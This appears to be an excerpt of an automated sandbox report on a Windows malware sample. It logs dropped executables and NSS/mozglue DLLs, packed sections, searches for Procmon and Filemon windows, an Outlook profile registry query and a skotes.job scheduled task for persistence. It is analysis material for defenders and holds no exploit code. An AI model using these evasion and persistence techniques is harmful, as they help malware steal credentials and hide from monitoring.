Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1960,i,3989721194292092949,15909847573822481878,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2176,i,5053567703941882623,5826024289119121658,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2060,i,13102130141342141745,5107454723265991497,262144 /prefetch:3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JDGIECGIEB.exe "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 5189120 > 1048576

Source: file.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x249000
Source: file.exe	Static PE information: Raw size of uftnznnm is bigger than: 0x100000 < 0x2a6400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.610000.0.unpack :EW;.rsrc:W;.idata :W;uftnznnm:EW;hqjjgthm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uftnznnm:EW;hqjjgthm:EW;.taggant:EW;
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Unpacked PE file: 16.2.JDGIECGIEB.exe.150000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 17.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 18.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 20.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: JDGIECGIEB.exe.0.dr	Static PE information: real checksum: 0x312248 should be: 0x317f63
Source: 931e3b56d4.exe.20.dr	Static PE information: real checksum: 0x1c643d should be: 0xf557c
Source: skotes.exe.16.dr	Static PE information: real checksum: 0x312248 should be: 0x317f63
Source: file.exe	Static PE information: real checksum: 0x502c1d should be: 0x4f322f
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1c643d should be: 0xf557c

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: uftnznnm
Source: file.exe	Static PE information: section name: hqjjgthm
Source: file.exe	Static PE information: section name: .taggant
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name:
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: .idata
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: fkuoncfi
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: cgsmbisr
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: zhhhapid
Source: random[1].exe.0.dr	Static PE information: section name: ciolgrdz
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: skotes.exe.16.dr	Static PE information: section name: fkuoncfi
Source: skotes.exe.16.dr	Static PE information: section name: cgsmbisr
Source: skotes.exe.16.dr	Static PE information: section name: .taggant
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: .idata
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: zhhhapid
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: ciolgrdz
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0016D91C push ecx; ret	16_2_0016D92F
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00161359 push es; ret	16_2_0016135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005CD91C push ecx; ret	17_2_005CD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005CD91C push ecx; ret	18_2_005CD92F

Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: entropy: 7.128626721102462
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.977234668888621
Source: random[1].exe.0.dr	Static PE information: section name: zhhhapid entropy: 7.923467527322307
Source: skotes.exe.16.dr	Static PE information: section name: entropy: 7.128626721102462
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: entropy: 7.977234668888621
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: zhhhapid entropy: 7.923467527322307

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\JDGIECGIEB.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\JDGIECGIEB.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\JDGIECGIEB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012962001\931e3b56d4.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Stores files to the Windows start menu directory

